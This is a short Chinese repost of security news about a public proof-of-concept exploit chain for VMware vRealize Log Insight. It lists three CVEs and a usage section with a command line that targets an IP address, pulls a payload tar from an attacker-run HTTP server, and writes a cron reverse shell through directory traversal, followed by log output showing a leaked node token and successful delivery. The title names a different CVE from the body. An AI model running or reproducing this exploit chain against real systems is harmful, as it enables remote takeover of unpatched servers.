-
VMware vRealize Log Insight 目录遍历漏洞 (CVE-2022-31706)
-
VMware vRealize Log Insight 破坏访问控制漏洞 (CVE-2022-31704)
-
VMware vRealize Log Insight 包含信息泄露漏洞 (CVE-2022-31711)
用法
$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered
故障排除
sudo chown root:root payload
sudo chmod 0644 payload
原文始发于微信公众号(安全客):研究人员发布VMware (CVE-2023-34051) POC 漏洞利用代码
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论